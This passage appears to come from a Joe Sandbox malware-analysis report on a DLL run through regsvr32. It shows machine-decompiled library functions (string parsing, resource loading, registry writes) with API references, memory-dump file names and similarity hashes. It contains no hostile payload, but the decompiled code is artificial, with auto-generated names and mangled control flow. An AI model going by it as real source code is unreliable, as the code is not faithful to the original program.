					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E100233E3();
						} else {
							_t23 = E100233BA();
						}
						L17:
						return E1001FBB5(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}

APIs

CharNextA.USER32(?), ref: 100133E1

Part of subcall function 100235A2: __ismbcspace_l.LIBCMT ref: 100235A8

CharNextA.USER32(00000000), ref: 100133FE
_strtol.LIBCMT ref: 10013429
_strtoul.LIBCMT ref: 10013430

Part of subcall function 100233E3: strtoxl.LIBCMT ref: 10023403

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
Instruction ID: f08684c254250480d72764a4ddbea2980768ff31fde62085fc420af539802239
Opcode Fuzzy Hash: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
Instruction Fuzzy Hash: 132124725002959BCB11DB758C81BAAB7E8EF49240F9180A6F991DB041DB70EE848B65

Uniqueness

Uniqueness Score: -1.00%

Function 1001829A Relevance: 6.1, APIs: 4, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E1001829A(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E10018237( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

APIs

SafeArrayDestroy.OLEAUT32 ref: 100182BB
CoTaskMemFree.OLE32(?), ref: 1001833E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
Instruction ID: c02b11928bb34d0169e99c27a309c5edd31e5ee767437d52a490cee524480b39
Opcode Fuzzy Hash: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
Instruction Fuzzy Hash: 831149306006169FDB95DF65D888BAE77E9EF05A82B594428F866DE190CB35DF80CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016E59 Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E10016E59(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E1001FBC4(E100341C0, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038988;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E1000EC55(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E10010284(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E1000E519();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038068;
						E100102E5(_t64 - 0x1c);
						return E1001FC9C(_t55);
					}
					_push(_t60);
					E10015A21( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E1000E519();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 10016E60
GetRgnBox.GDI32(?,?), ref: 10016EDB
IntersectRect.USER32 ref: 10016EF0
EqualRect.USER32 ref: 10016EFE

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
Instruction ID: 9e2c62e01a377e36abd0cffc80b86d38f34e6c8c4516d003d55709a082953a26
Opcode Fuzzy Hash: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
Instruction Fuzzy Hash: BA21027690024AEFDF02DFA4CC809AEBBB8FF08201F00855AF555AB112DB75EA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100050DA Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E100050DA(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E1001FBC4(E10032EBF, __ebx, __edi, __esi);
				_t35 = E10004D4A(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E100050A8(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E100209E8( &_a4, 0x1003e34c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10004EB7(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

APIs

__EH_prolog3.LIBCMT ref: 100050E1

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

__CxxThrowException@8.LIBCMT ref: 10005117
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,1000103F,00000000,00000000,?,?,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10005140

Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7

LocalFree.KERNEL32(1000103F,1000103F,8007000E,100010E9), ref: 10005169

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
Instruction ID: 9a825a0554ffdf54c91d77e2f252a4914c60dad5953363715cdae4c7005f82be
Opcode Fuzzy Hash: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
Instruction Fuzzy Hash: E0117071604249BFEB01DFA4CC81AAF7BA9FF08391F118529F629CB291D7329E50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10007DCD Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10007DCD(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000EC09(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 10007DF3
LoadResource.KERNEL32(?,00000000), ref: 10007DFB
LockResource.KERNEL32(00000000), ref: 10007E0D
FreeResource.KERNEL32(00000000), ref: 10007E57

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
Instruction ID: 3dc56c73a436512b808f722c38b75c0ae418026c2f8f50a1f0547d44829b82b9
Opcode Fuzzy Hash: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
Instruction Fuzzy Hash: B3119D70902B95EFE710DF61CC88AABB3B8FF08395B218499E84653555E3B8AD40D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 10006279 Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10006279(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1001FBC4(E10032FC2, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E10006D2B(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1003701c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E10021041( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000EC09(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E10004E6E(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E10005EE5(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E1001FC9C(_t51);
			}

APIs

__EH_prolog3.LIBCMT ref: 10006280

Part of subcall function 10006D2B: __EH_prolog3.LIBCMT ref: 10006D32

__strdup.LIBCMT ref: 100062A2
GetCurrentThread.KERNEL32 ref: 100062CF
GetCurrentThreadId.KERNEL32 ref: 100062D8

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
Instruction ID: a861acdeb37d33d153d410a00307fa8db88fca58120f636a03fd206092374481
Opcode Fuzzy Hash: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
Instruction Fuzzy Hash: CA218CB4800B50CED721DF6AC58125AFBE8FFA4340F20891FE1AA86622CBB4A541CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4FC Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000C4FC(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E1000BBDF(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10044410;
					E100209E8( &_v20, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, SendMessageA, _t33);
					_t29 = E100105C8(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000E58E(_t29);
					}
					return E1001FC9C(_t24);
				}
			}

APIs

SendMessageA.USER32 ref: 1000C526
SendMessageA.USER32 ref: 1000C551

Part of subcall function 1000B21C: GetTopWindow.USER32(?), ref: 1000B22A

GetCapture.USER32 ref: 1000C563
SendMessageA.USER32 ref: 1000C572

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
Instruction ID: 6be588b9800c4661a8048c77b3f4dc846bf52327d538fd1bacd6bd973810de05
Opcode Fuzzy Hash: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
Instruction Fuzzy Hash: CE0184B535061C7FFA216B248CC9FBB36ADEB4C7C9F010534F2419B0A6C6915C405620

Uniqueness

Uniqueness Score: -1.00%

Function 1000DA65 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000DA65(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E1000EC09(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1000DA89
LoadResource.KERNEL32(?,00000000), ref: 1000DA95
LockResource.KERNEL32(00000000), ref: 1000DAA3
FreeResource.KERNEL32(00000000), ref: 1000DAD1

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
Instruction ID: 4e046e32b577ecbefe1a9e82239a09ae3eb10ed0fe8967592b5f7829ae1b7b8f
Opcode Fuzzy Hash: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
Instruction Fuzzy Hash: 71113A71604214EFEB01DFA5C888AAE7BB9FF0A390F01806AF90697261CB75DD00CF61

Uniqueness

Uniqueness Score: -1.00%

Function 10010F7E Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10010F7E(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10045580; // 0x771f5646
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10020F02( &_v24, 0x10, 0x1003809c, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10010F38(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
